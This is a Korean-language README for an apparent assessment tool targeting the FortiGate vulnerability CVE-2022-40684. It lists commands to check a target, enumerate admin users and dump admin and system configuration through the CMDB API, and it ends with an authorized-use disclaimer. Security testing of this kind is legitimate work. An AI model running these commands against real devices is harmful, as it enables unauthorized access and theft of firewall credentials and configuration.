
FortiGate CVE-2022-40684 평가 도구: 사용자 열거, 구성 덤프 및 랩 테스트용
이 도구는 노출된 CMDB API 엔드포인트를 호출하여 FortiGate 장치의 CVE-2022-40684 노출 여부를 식별하고 검증할 수 있도록 보안 전문가를 지원합니다.
관리 사용자 및 사용자 그룹 열거와 통제된 환경에서의 분석을 위한 선택적 구성 추출을 지원합니다.
의존성 설치: pip3 install -r requirements.txt
취약점 확인:
python3 fortigate_tool.py -t <target>
사용자 열거:
python3 fortigate_tool.py -t <target> --enum
특정 엔드포인트 덤프:
python3 fortigate_tool.py -t <target> --dump /api/v2/cmdb/system/admin
중요한 구성 일괄 덤프:
python3 fortigate_tool.py -t <target> --dump-all
덤프된 구성은 로컬의 다음 위치에 저장됩니다: fortigate_dump/
이 도구는 교육 목적 및 승인된 보안 테스트 전용으로 제작되었습니다. 명시적 허가 없이 이 도구를 시스템에 사용하지 마십시오. 작성자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.